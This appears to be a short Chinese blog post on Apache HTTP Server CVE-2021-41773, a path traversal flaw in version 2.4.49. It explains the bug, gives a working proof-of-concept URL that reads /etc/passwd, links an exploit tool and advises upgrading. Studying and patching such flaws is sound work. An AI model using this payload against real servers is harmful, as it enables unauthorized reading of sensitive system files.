Apache——CVE-2021-41773

前言:

Apache Software 已迅速发布了针对 Apache HTTP Server 中的零日安全漏洞的修复程序,该漏洞于上周首次报告给该项目。该漏洞正在野外被积极利用,它表示,并可能允许攻击者访问敏感信息。

CVE-2021-41773 可能允许路径遍历和随后的文件泄露。路径遍历问题允许未经授权的人访问 Web 服务器上的文件,方法是欺骗 Web 服务器或在其上运行的 Web 应用程序返回存在于 Web 根文件夹之外的文件。

该问题仅影响 Apache 开源 Web 服务器的 2.4.49 版,在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷,攻击者可以利用以进行进一步攻击的敏感信息。

漏洞复现:

直接访问地址,插入poc  /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Apache——CVE-2021-41773_第1张图片

漏洞POC:

127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

利用工具:
https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013

 Apache——CVE-2021-41773_第2张图片

修复方式:

升级到高版本

“要求所有拒绝”(拒绝访问所有请求)是保护 Web 根目录之外的文档的默认设置

你可能感兴趣的:(apache,cve)